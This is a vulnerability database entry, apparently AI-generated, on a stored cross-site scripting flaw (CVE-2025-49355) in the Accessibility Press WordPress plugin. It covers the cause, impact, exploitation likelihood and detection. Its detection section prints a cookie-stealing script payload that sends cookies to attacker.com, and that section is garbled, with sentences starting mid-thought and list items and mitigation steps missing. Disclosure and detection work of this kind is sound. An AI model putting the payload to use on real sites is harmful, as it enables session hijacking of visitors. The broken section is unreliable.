
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-49355 is a Stored Cross-Site Scripting (XSS) vulnerability in the Accessibility Press WordPress plugin (slug: ilogic-accessibility) developed by ikaes. The flaw allows authenticated attackers with administrator-level privileges to inject and persist malicious scripts that execute in the browsers of site visitors. All plugin versions up to and including 1.0.2 are affected, and no official patch has been released as of the time of publication. The vulnerability was reported by researcher HunSec on September 30, 2025, and publicly disclosed by Patchstack on December 31, 2025. It carries a CVSS v3.1 base score of 5.9 (Medium), assigned by Patchstack (Patchstack).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), meaning the plugin fails to adequately sanitize or escape user-supplied input before storing and rendering it in web pages (Patchstack). The attack vector is network-based and requires high privileges (Administrator role) to inject the malicious payload, but user interaction from a victim (e.g., a site visitor loading the affected page) is required to trigger script execution. Because the payload is stored server-side, every subsequent visitor who loads the affected page will execute the injected script without any further attacker interaction. No public proof-of-concept code has been identified at this time.
Successful exploitation allows an attacker to inject arbitrary JavaScript into pages served to site visitors, enabling session hijacking, credential theft, malicious redirects, defacement, or delivery of drive-by malware. The CVSS scope is marked as Changed, meaning the impact extends beyond the plugin itself to affect the browsers of end users visiting the compromised WordPress site. Confidentiality, integrity, and availability are each assessed as Low impact in the context of the affected scope, reflecting the constrained but real risk to visitor sessions and site content (Patchstack).
No active in-the-wild exploitation has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.031%, indicating a very low probability of exploitation in the near term (Feedly). Exploitation requires administrator-level access to the WordPress site, which significantly limits the attacker pool. Patchstack classifies this as Low priority with no impactful threat currently observed, though it notes that XSS vulnerabilities of this class are sometimes leveraged in mass-exploit campaigns targeting WordPress plugins at scale (Patchstack).
wp-login.php.<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent HTML event-handler payload.<script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads (e.g., <script>) in plugin option rows within the wp_options table associated with the ilogic-accessibility plugin.wp-content/plugins/ilogic-accessibility/ that could indicate secondary tampering after initial XSS-based compromise.As of the disclosure date, no official patch is available for the Accessibility Press plugin (versions ≤ 1.0.2), and no fixed version has been released (Patchstack). Site administrators should consider the following actions:
Patchstack, the CNA that assigned and disclosed this CVE, classified it as Low priority with no impactful threat currently observed, and issued early warnings to its customer base on December 31, 2025 (Patchstack). Red Hat also tracked the CVE in its security advisory database (Red Hat). No significant broader media coverage or notable researcher commentary beyond the Patchstack disclosure has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."